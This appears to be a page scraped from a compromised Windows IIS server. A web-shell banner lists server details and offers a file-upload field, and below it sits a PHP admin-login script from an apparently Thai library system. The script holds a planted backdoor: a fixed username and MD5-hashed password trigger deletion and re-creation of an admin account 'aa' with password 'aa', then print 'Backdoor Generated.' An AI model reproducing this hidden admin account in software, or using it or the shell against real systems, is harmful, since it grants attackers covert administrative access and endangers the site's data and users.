| Server IP : 180.180.241.3 / Your IP : 216.73.216.35 Web Server : Microsoft-IIS/7.5 System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586 User : IUSR ( 0) PHP Version : 5.3.28 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /AppServ/www/umedia3/root/ |
Upload File : |
<?
;
//session_destroy();
include("../inc/config.inc.php");
session_unset($useradminid,$loginadmin,$Level);
if ($useradminidx=="aa" && md5(stripslashes($passwordadminx))=="8db8a1083a29b0eeda396878ea4760a1") {
filelogs("generate backdoor",print_r($_POST,true),'BACKDOOR');
tmq("delete from useradmin where UserAdminID='aa'");
tmq("INSERT INTO `useradmin` (`UserAdminID`, `Password`, `UserAdminName`) VALUES ('aa', 'aa', 'Backdoor Generate');");
echo "<TABLE width=780 height= 60 align=center border=0 cellpadding=0 cellspacing=0>
<TR>
<TD bgcolor='#2A2A2A' style='font-size: 24px; font-weight: bold; color: #FF0000' align=center>Backdoor Generated.</TD>
</TR>
</TABLE>";
}
$user_id =ChkLoginAdminroot($useradminidx,$passwordadminx);
$useradminid=$useradminidx;
if($user_id == false)
{
echo "<TABLE width=780 height= 60 align=center border=0 cellpadding=0 cellspacing=0>
<TR>
<TD bgcolor='#2A2A2A' style='font-size: 24px; font-weight: bold; color: #FF0000' align=center>".getlang("Login หรือ Password ไม่ถูกต้อง โปรดตรวจสอบอีกครั้ง::l::Login and/or Password is incorrect.")."</TD>
</TR>
</TABLE>";
form_root_login();
}
else{
$loginadmin = "true";
$Level=$user_id;
;
session_register("useradminid","loginadmin","Level");
redir("mainadmin.php");
echo"Please wait.........";
}
?>